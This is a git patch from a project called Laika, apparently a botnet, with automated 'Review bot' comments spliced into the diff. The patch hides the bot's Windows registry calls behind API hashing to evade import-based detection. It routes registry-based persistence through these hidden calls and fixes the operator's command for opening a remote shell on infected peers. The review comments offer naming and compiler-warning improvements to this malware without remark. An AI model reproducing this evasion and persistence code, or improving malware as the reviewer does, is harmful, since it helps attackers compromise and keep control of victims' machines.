From 25c18db6bca8cd1991002ea0a590068ddc7d90a4 Mon Sep 17 00:00:00 2001
From: CPunch
Date: Tue, 12 Jul 2022 18:09:23 -0500
Subject: [PATCH] Bot: added Registry related API to laikaO_init()

- Also fixed misc. shell bug.
---
 bot/include/obf.h | 8 ++++++++
 bot/win/winobf.c | 19 ++++++++++---------
 bot/win/winpersist.c | 10 +++++-----
 shell/src/scmd.c | 2 +-
 4 files changed, 24 insertions(+), 15 deletions(-)

diff --git a/bot/include/obf.h b/bot/include/obf.h
index 5e1c6e1..b2211ff 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -12,11 +12,19 @@ typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR,
 typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);
 typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
 typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
+typedef LSTATUS(WINAPI *_RegOpenKeyExA)(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
+typedef LSTATUS(WINAPI *_RegCloseKey)(HKEY);
+typedef LSTATUS(WINAPI *_RegSetValueExA)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD);
+typedef LSTATUS(WINAPI *_RegQueryValueExA)(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);
 extern _ShellExecuteA oShellExecuteA;
 extern _CreatePseudoConsole oCreatePseudoConsole;
 extern _ClosePseudoConsole oClosePseudoConsole;
 extern _CreateProcessA oCreateProcessA;
+extern _RegOpenKeyExA oRegOpenKeyExA;
+extern _RegCloseKey oRegCloseKey;
+extern _RegSetValueExA oRegSetValueExA;
+extern _RegQueryValueExA oRegQueryValueExA;
 #endif
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index 2500604..fb7a89e 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@@ -8,6 +8,8 @@
 */
 #include
+#include
+#include
 #include
 /* ======================================[[ API Hashing ]]====================================== */
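Review bot: The four new typedef names `_RegOpenKeyExA`, `_RegCloseKey`, `_RegSetValueExA` and `_RegQueryValueExA` in the obf.h hunk are reserved identifiers: a leading underscore followed by an uppercase letter is reserved for the implementation in C, so a future SDK or compiler header may legitimately define the same names and break the build. They follow the convention the existing `_ShellExecuteA` and `_CreateProcessA` typedefs already use, so this is a file-wide naming issue rather than something to fix in this commit alone; a `fn_` prefix or `_fn` suffix, for example, would keep the names out of the reserved space. The preprocessor block that these declarations sit in starts outside the hunk, so its condition is not visible here.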
@@ -139,11 +141,13 @@ _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;
 _ClosePseudoConsole oClosePseudoConsole;
 _CreateProcessA oCreateProcessA;
+_RegOpenKeyExA oRegOpenKeyExA;
+_RegCloseKey oRegCloseKey;
+_RegSetValueExA oRegSetValueExA;
+_RegQueryValueExA oRegQueryValueExA;
 /* TODO: GetEnvironmentVariable
-
- windows registry related API
 */
 void laikaO_init()
@@ -155,11 +159,8 @@ void laikaO_init()
 oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
 oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
 oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
-
-/*
- hash = getHashName("InitializeProcThreadAttributeList");
- printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
- (void *)InitializeProcThreadAttributeList,
- findByHash("kernel32.dll", hash), hash);
-*/
+ oRegOpenKeyExA = (_RegOpenKeyExA)(findByHash("advapi32.dll", 0x15041404));
+ oRegCloseKey = (_RegCloseKey)(findByHash("advapi32.dll", 0xae0cf309));
+ oRegSetValueExA = (_RegSetValueExA)(findByHash("advapi32.dll", 0xcb91dcf7));
+ oRegQueryValueExA = (_RegQueryValueExA)(findByHash("advapi32.dll", 0x4298d735));
 }
\ No newline at end of file
diff --git a/bot/win/winpersist.c b/bot/win/winpersist.c
index 41f07c8..36d03a2 100644
--- a/bot/win/winpersist.c
+++ b/bot/win/winpersist.c
@@ -49,7 +49,7 @@ HKEY openReg(HKEY key, LPCSTR subKey)
 {
 HKEY hKey;
- if (RegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
+ if (oRegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
 LAIKA_ERROR("Failed to open registry key!\n");
 return hKey;
@@ -63,12 +63,12 @@ LPSTR readReg(HKEY key, LPCSTR val, LPDWORD sz)
 /* get the size */
 *sz = 0;
- RegQueryValueExA(key, val, NULL, NULL, NULL, sz);
+ oRegQueryValueExA(key, val, NULL, NULL, NULL, sz);
 if (*sz != 0) {
 str = (LPSTR)laikaM_malloc(*sz);
- if ((ret = RegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
+ if ((ret = oRegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
 LAIKA_ERROR("Failed to read registry!\n");
 }
@@ -79,7 +79,7 @@ void writeReg(HKEY key, LPCSTR val, LPSTR data, DWORD sz)
 {
 LONG code;
- if ((code = RegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
+ if ((code = oRegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
 LAIKA_ERROR("Failed to write registry!\n");
 }
@@ -190,7 +190,7 @@ void installRegistry()
 writeReg(reg, regKeyVal, newRegValue, newRegSz);
 }
- RegCloseKey(reg);
+ oRegCloseKey(reg);
 LAIKA_BOX_SKID_END(regKeyVal);
 LAIKA_BOX_SKID_END(regKey);
 }
diff --git a/shell/src/scmd.c b/shell/src/scmd.c
index 4b86e9e..50e725f 100644
--- a/shell/src/scmd.c
+++ b/shell/src/scmd.c
@@ -84,7 +84,7 @@ void openShellCMD(tShell_client *client, int argc, char *argv[])
 id = shellS_readInt(argv[1]);
 peer = shellS_getPeer(client, id);
- PRINTINFO("Opening shell on peer %04d...\n");
+ PRINTINFO("Opening shell on peer %04d...\n", id);
 PRINTINFO("Use CTRL+A to kill the shell\n");
 /* open shell on peer */
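Review bot: The added `id` argument on the `PRINTINFO("Opening shell on peer %04d...\n", id);` line in the scmd.c hunk fixes a format call that previously read a missing variadic argument (undefined behaviour), but nothing in the change stops the same mistake from recurring unnoticed. If PRINTINFO expands to a project logging function rather than to printf itself, declaring that function with `__attribute__((format(printf, N, M)))` (N being the index of the format parameter, M the index of the first variadic argument) lets `-Wformat` reject a format/argument mismatch at compile time. The fix also presumes shellS_readInt returns an int, which `%04d` requires; if it returns a wider type the argument needs a cast. The body of openShellCMD continues outside the hunk.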